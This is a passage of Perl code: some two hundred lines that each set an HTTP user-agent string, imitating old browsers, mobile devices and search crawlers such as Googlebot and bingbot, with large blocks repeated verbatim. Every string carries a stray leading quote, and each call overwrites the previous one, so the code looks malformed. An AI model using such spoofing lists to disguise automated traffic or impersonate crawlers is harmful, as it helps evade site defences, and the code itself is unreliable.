  3292. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3293. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3294. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3295. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3296. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3297. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3298. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3299. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3300. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3301. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3302. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3303. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3304. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3305. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3306. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3307. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3308. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3309. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3310. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3311. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3312. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3313. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3314. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3315. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3316. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3317. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  3318. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3319. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  3320. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  3321. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  3322. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  3323. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  3324. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  3325. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  3326. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  3327. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  3328. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3329. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  3330. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  3331. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  3332. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  3333. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  3334. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  3335. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3336. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  3337. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3338. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3339. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3340. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3341. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3342. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3343. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3344. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3345. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3346. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3347. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3348. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3349. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  3350. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  3351. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3352. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3353. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3354. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3355. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3356. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3357. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3358. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3359. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3360. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3361. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3362. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3363. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3364. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3365. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3366. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3367. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3368. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3369. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3370. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3371. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3372. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3373. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3374. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3375. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3376. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3377. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3378. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3379. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3380. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3381. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3382. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3383. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3384. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3385. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3386. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3387. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3388. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3389. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3390. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3391. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3392. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3393. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3394. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3395. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3396. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3397. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3398. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3399. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3400. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3401. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3402. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3403. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3404. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3405. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3406. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3407. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3408. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3409. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3410. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3411. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3412. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3413. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3414. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3415. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3416. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3417. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3418. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3419. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3420. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3421. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3422. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3423. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3424. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3425. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3426. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3427. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3428. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3429. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3430. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3431. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3432. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3433. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3434. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3435. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3436. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3437. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3438. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3439. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3440. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3441. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3442. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3443. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3444. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3445. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3446. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3447. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3448. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3449. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3450. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3451. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3452. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  3453. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  3454. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  3455. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  3456. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  3457. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3458. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3459. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  3460. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  3461. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  3462. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  3463. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  3464. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3465. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3466. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3467. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3468. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  3469. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3470. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  3471. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  3472. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  3473. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  3474. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3475. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  3476. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  3477. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  3478. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  3479. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  3480. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  3481. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  3482. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  3483. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  3484. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  3485. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  3486. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3487. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3488. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  3489. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  3490. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  3491. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
